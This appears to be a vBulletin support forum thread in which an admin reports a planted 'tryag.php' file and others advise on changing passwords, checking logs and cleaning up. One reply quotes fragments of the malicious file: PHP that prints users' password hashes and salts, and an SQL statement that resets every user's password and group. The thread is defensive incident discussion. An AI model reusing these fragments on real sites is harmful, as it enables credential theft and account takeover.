Hacked by "Tryag"

[Jaggee]

<a href="http://pastebin.com/6k6UYFYJ" target="_blank">http://pastebin.com/6k6UYFYJ</a>
That file got uploaded to my forum directory somehow, no clue how.

[ForceHSS]

It was uploaded from the ftp change ftp, cpanel, and forum admin passwords. Check all files in the ftp then once you have removed all they uploaded then upload a fresh copy yourself then also check if they logged into the admin panel if so check logs

[Lynne]

Your server logs should tell you how they uploaded the file. You should contact your host and have them look through the logs with you to figure out how this was done.

[helmer.co]

What was the file name an directory? Also what version of VB4 are you running.

[ForceHSS]

Quote:

Originally Posted by Jaggee

http://pastebin.com/6k6UYFYJ
That file got uploaded to my forum directory somehow, no clue how.

If you check that coding its nasty this is what I mean

Code:

<td class="style5"><?echo $r[userid]?></td>
                                <td class="style5"><?echo $r[username]?></td>
                                <td class="style5"><?echo $r[email]?></td>
                                <td class="style5"><?echo $r[password]?></td>
                                <td class="style5"><?echo $r[salt]?></td>

And

Code:

$okey=mysql_query("UPDATE user SET password='e8be21235122e78d824eef4514b87be4',salt='oky',usergroupid='6'");

But there is even worst parts in the code to worry about in there

[Jaggee]

Quote:

Originally Posted by helmer.co

What was the file name an directory? Also what version of VB4 are you running.

Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.

[Lynne]

Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.

[Jaggee]

Quote:

Originally Posted by Lynne

Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.

When you connect with SSH, it instantly uses the command "sftp", which calls for the SFTP software to transfer files, basically like FTP. The Shell logs (messages & secure) only shows commands, not what happens inside the software. & sftp-server never showed any logs.

[Lionel]

My admincp of one my sites once got hacked. They created a plugin that could be ran via ranks.php and have complete control of my server. Since then I stealth protect that admin folder in addition to firewall SSH, FTP. What was stranged but I never complained, the password I was using was unique and specific only on two sites: here and that site. Lucky for me I basically live on my PC and I was able to catch that P0wersurge SOB instantly and protect myself.

[helmer.co]

Quote:

Originally Posted by Jaggee

Latest version of vB4, that was on root directory of the forum, filename called "tryag.php"

Didn't find out how it was uploaded, by logs.

When you say the latest version, you mean 4.22 PL1 with the install directory deleted correct? It is really a shame your logs did not show anything. Do you suspect he hacked your root name and password?

Did you use them at any other sites?